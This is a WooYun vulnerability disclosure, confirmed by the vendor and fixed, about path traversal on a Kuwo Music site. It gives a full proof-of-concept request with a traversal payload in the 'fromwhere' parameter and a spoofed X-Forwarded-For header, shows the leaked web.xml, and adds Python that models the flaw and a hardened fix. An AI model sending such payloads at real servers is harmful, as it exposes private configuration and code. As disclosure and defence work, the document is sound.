
Vulnerability Summary (24 followers)

Defect ID: wooyun-2015-099317

Title: Arbitrary file read on a Kuwo Music site

Vendor: Kuwo Music (酷我音乐)

Author: Forever80s

Submitted: 2015-03-03 20:46

Fixed: 2015-04-17 20:48

Published: 2015-04-17 20:48

Vulnerability type: Arbitrary file traversal/download

Severity (author's rating): High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-03-03: Details sent to the vendor, awaiting vendor handling
2015-03-04: Vendor confirmed; details visible to the vendor only
2015-03-14: Details opened to core white hats and relevant domain experts
2015-03-24: Details opened to regular white hats
2015-04-03: Details opened to intern white hats
2015-04-17: Details opened to the public

Brief description:

Detailed description:

Proof of vulnerability:

Site: mc.kuwo.cn
Arbitrary file read by path traversal. The `fromwhere` parameter of POST /g/st/WulinLogin is used to build a server-side file path; sending `../WEB-INF/web.xml;x=` (URL-encoded in the request below) returns the web application's own web.xml, a file that is never meant to be served. The trailing `;x=` is the servlet path-parameter trick: a servlet container strips `;name=value` from a path segment before mapping it to a file, so presumably it is there to discard a suffix the application appends after the user-controlled value.

POST /g/st/WulinLogin HTTP/1.1
Referer: http://mc.kuwo.cn/g/jsp/mingchao/zc.jsp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: mc.kuwo.cn
Content-Length: 65
Accept-Encoding: gzip, deflate

fromwhere=..%2fWEB-INF%2fweb.xml%3bx%3d&username=&password=&code=


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 21 Feb 2015 11:34:40 GMT
Content-Type: application/xml;charset=utf-8
Content-Length: 173237
Connection: keep-alive
Last-Modified: Thu, 05 Feb 2015 03:46:27 GMT
X-Cache: MISS from 74localhost.localdomain
Vary: Accept-Encoding

<?xml version="1.0" encoding="UTF-8"?>
<web-app version="2.4"
xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
<!--
<servlet>
<servlet-name>jsp</servlet-name>
<servlet-class>org.apache.jasper.servlet.JspServlet</servlet-class>
<init-param>
<param-name>fork</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>xpoweredBy</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>trimSpaces</param-name>
<param-value>true</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
-->
<servlet>
<description>JumpDiguoServlet</description>
<display-name>JumpDiguoServlet</display-name>
<servlet-name>JumpDiguoServlet</servlet-name>
<servlet-class>com.koowo.game.w51wan.diguo.JumpDiguoServlet</servlet-class>
</servlet>
<servlet>
<description>JumpLuanwuServlet</description>
<display-name>JumpLuanwuServlet</display-name>
<servlet-name>JumpLuanwuServlet</servlet-name>
<servlet-class>com.koowo.game.w51wan.luanwu.JumpLuanwuServlet</servlet-class>
</servlet>
<servlet>
<description>InitServlet</description>
<display-name>InitServlet</display-name>
<servlet-name>InitServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.InitServlet</servlet-class>
</servlet>
<servlet>
<description>JumpQilongServlet</description>
<display-name>JumpQilongServlet</display-name>
<servlet-name>JumpQilongServlet</servlet-name>
<servlet-class>com.koowo.game.duniu.qilong.JumpQilongServlet</servlet-class>
</servlet>
<servlet>
<description>UserLogin51wanServelt</description>
<display-name>UserLogin51wanServelt</display-name>
<servlet-name>UserLogin51wanServelt</servlet-name>
<servlet-class>com.koowo.game.w51wan.UserLogin51wanServelt</servlet-class>
</servlet>
<servlet>
<description>IndexServlet</description>
<display-name>IndexServlet</display-name>
<servlet-name>IndexServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.IndexServlet</servlet-class>
</servlet>
<servlet>
<description>AllAn</description>
<display-name>AllAn</display-name>
<servlet-name>AllAn</servlet-name>
<servlet-class>com.koowo.game.servlet.AllAnServlet</servlet-class>
</servlet>
<servlet>
<description>GameAn</description>
<display-name>GameAn</display-name>
<servlet-name>GameAn</servlet-name>
<servlet-class>com.koowo.game.servlet.GameAnServlet</servlet-class>
</servlet>
<servlet>
<description>An</description>
<display-name>An</display-name>
<servlet-name>AnServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.AnServlet</servlet-class>
</servlet>
<servlet>
<description>AllGame</description>
<display-name>AllGame</display-name>
<servlet-name>AllGameServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.AllGameServlet</servlet-class>
</servlet>
<servlet>
<description>Game</description>
<display-name>Game</display-name>
<servlet-name>GameServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.GameServlet</servlet-class>
</servlet>
<servlet>
<description>JumpSanguoServlet</description>
<display-name>JumpSanguoServlet</display-name>
<servlet-name>JumpSanguoServlet</servlet-name>
<servlet-class>com.koowo.game.kunlun.sanguo.JumpSanguoServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>JumpJianxia</servlet-name>
<servlet-class>com.koowo.game.w51wan.jianxia.JumpJianxiaServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>JumpWulinServlet</servlet-name>
<servlet-class>com.koowo.game.w9wee.wulin.JumpWulinServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>wulinIndexServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.wulin.IndexServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>AllNewsServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.AllNewsServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>FresherGuideServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.FresherGuideServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>ZiLiaoServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.ZiLiaoServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>DirectSignServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.DirectSignServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>ShowContentServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.ShowContentServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>NewIndexServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.NewIndexServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>EntryServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.EntryServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>WulinLoginServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.wulin.WulinLoginServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>CheckUserNameServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.CheckUserNameServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>HuoDongServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.HuoDongServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>GongLueServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.GongLueServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>rexueIndexServlet</servlet-name>
... sensitive entries omitted ...


Traversal works; the same request reads other files under the web application.
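The following is an added example, not Kuwo's code and not part of the WooYun report. It models the path handling the `fromwhere` PoC above exploits, puts a hardened resolver next to it, and parses a leaked web.xml to list what else the same read exposes. Everything about the server side is an assumption inferred from the Referer `/g/jsp/mingchao/zc.jsp`, not stated in the report: that the `/g` web application forwards the login request to `jsp/<fromwhere>.jsp` under a hypothetical web root `/srv/app`, and that the container strips `;name=value` path parameters per segment (standard servlet behaviour). The sample web.xml is constructed from two of the entries shown above.

```python
"""
Added example (not Kuwo's code, not from the WooYun report): model of the
`fromwhere` traversal, a hardened resolver, and a web.xml exposure parser.

Assumptions (hypothetical, inferred from the PoC's Referer /g/jsp/...):
the servlet forwards to jsp/<fromwhere>.jsp under WEBROOT, and the container
drops `;name=value` path parameters from each segment before opening the file.
"""
from __future__ import annotations

import posixpath
import xml.etree.ElementTree as ET
from urllib.parse import unquote

WEBROOT = "/srv/app"        # hypothetical exploded-WAR directory for the /g context
DISPATCH_DIR = "jsp"        # hypothetical directory the servlet forwards into
APPENDED_SUFFIX = ".jsp"    # hypothetical suffix appended after the user value


def strip_path_params(path: str) -> str:
    """Drop `;key=value` path parameters per segment, as servlet containers do.
    'WEB-INF/web.xml;x=.jsp' -> 'WEB-INF/web.xml'."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def vulnerable_resolve(fromwhere: str) -> str:
    """File a naive dispatcher built as DISPATCH_DIR + fromwhere + ".jsp" ends up
    serving. With the PoC value the `;x=` swallows the suffix and `..` leaves jsp/."""
    target = f"{DISPATCH_DIR}/{unquote(fromwhere)}{APPENDED_SUFFIX}"
    target = strip_path_params(target)
    return posixpath.normpath(posixpath.join(WEBROOT, target))


class UnsafePath(ValueError):
    """Raised by safe_resolve for any value that must not reach the dispatcher."""


def safe_resolve(fromwhere: str) -> str:
    """Hardened resolver: decode exactly once, refuse path parameters, NUL bytes,
    backslashes, absolute paths and dot segments, then verify the normalised
    result is still inside DISPATCH_DIR and never touches WEB-INF or META-INF."""
    raw = unquote(fromwhere)
    if any(ch in raw for ch in (";", "\x00", "\\")):
        raise UnsafePath("forbidden character in fromwhere")
    if raw.startswith("/") or any(seg in ("..", ".") for seg in raw.split("/")):
        raise UnsafePath("absolute path or dot segment in fromwhere")
    base = posixpath.normpath(posixpath.join(WEBROOT, DISPATCH_DIR))
    target = posixpath.normpath(posixpath.join(base, raw + APPENDED_SUFFIX))
    if not target.startswith(base + "/"):
        raise UnsafePath("resolved outside the dispatch directory")
    if any(seg.upper() in ("WEB-INF", "META-INF") for seg in target.split("/")):
        raise UnsafePath("container-private directory")
    return target


def exposed_class_files(web_xml: str) -> list[str]:
    """Web-root-relative paths of the compiled servlet classes a leaked web.xml
    names (loose classes under WEB-INF/classes; a jar under WEB-INF/lib would be
    just as readable). Once web.xml is out, treat the application code as out too."""
    root = ET.fromstring(web_xml)
    paths = []
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] != "servlet":      # ignore the j2ee namespace
            continue
        for child in el:
            if child.tag.rsplit("}", 1)[-1] == "servlet-class" and child.text:
                cls = child.text.strip()
                paths.append("WEB-INF/classes/" + cls.replace(".", "/") + ".class")
    return paths


# Constructed sample mirroring two entries from the leaked web.xml above.
SAMPLE_WEB_XML = """<web-app version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee">
  <servlet>
    <servlet-name>WulinLoginServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.wulin.WulinLoginServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>IndexServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.IndexServlet</servlet-class>
  </servlet>
</web-app>"""

POC_FROMWHERE = "..%2fWEB-INF%2fweb.xml%3bx%3d"   # value from the PoC request above

if __name__ == "__main__":
    print("vulnerable:", vulnerable_resolve(POC_FROMWHERE))
    try:
        safe_resolve(POC_FROMWHERE)
    except UnsafePath as exc:
        print("hardened  :", exc)
    for p in exposed_class_files(SAMPLE_WEB_XML):
        print("class file:", p)
```

The hardened resolver decodes once on purpose: a second decode would turn `%252e%252e` into `..` after the checks ran. The containment check is done on the normalised path rather than on the raw string so that any segment combination the filesystem would collapse is judged by its final form.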

Fix recommendation:

Copyright notice: when reposting, please credit the source: Forever80s@乌云 (WooYun)


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-03-04 09:43

Vendor reply:

Thanks for supporting Kuwo.

Latest status:

None


Vulnerability rating:

Comments

  1. 2015-03-03 21:14 | 爱上平顶山 Certified white hat ( Core white hat | Rank: 2738 Vulnerabilities: 547 | [No hat] A wanderer far from home. Formerly worked at a certain domestic institution. IT...)

    So energetic!